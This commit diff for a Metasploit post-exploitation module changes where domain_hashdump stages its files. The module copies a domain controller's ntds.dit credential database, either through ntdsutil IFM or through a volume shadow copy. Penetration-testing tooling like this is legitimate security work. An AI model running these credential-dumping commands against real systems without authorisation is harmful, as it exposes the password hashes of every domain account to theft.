explicitly use windows\temp

instead of using the user temp directory
trying to get around some intermittant permissions
issues

MSP-12358

Author: David Maloney

modules/post/windows/gather/credentials/domain_hashdump.rb

@@ -77,7 +77,7 @@ def is_domain_controller?
   end
 
   def ntdsutil_method
-    tmp_path = "#{get_env("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    tmp_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
     result = cmd_exec("ntdsutil.exe", command_arguments,90)
     if result.include? "IFM media created successfully"
@@ -147,7 +147,7 @@ def vss_method
     print_status "Getting Details of ShadowCopy #{id}"
     sc_details = get_sc_details(id)
     sc_path = "#{sc_details['DeviceObject']}\\windows\\ntds\\ntds.dit"
-    target_path = "#{get_env("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    target_path = "#{get_env("%WINDIR%")}\\Temp\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
     print_status "Moving ntds.dit to #{target_path}"
     move_file(sc_path, target_path)
     target_path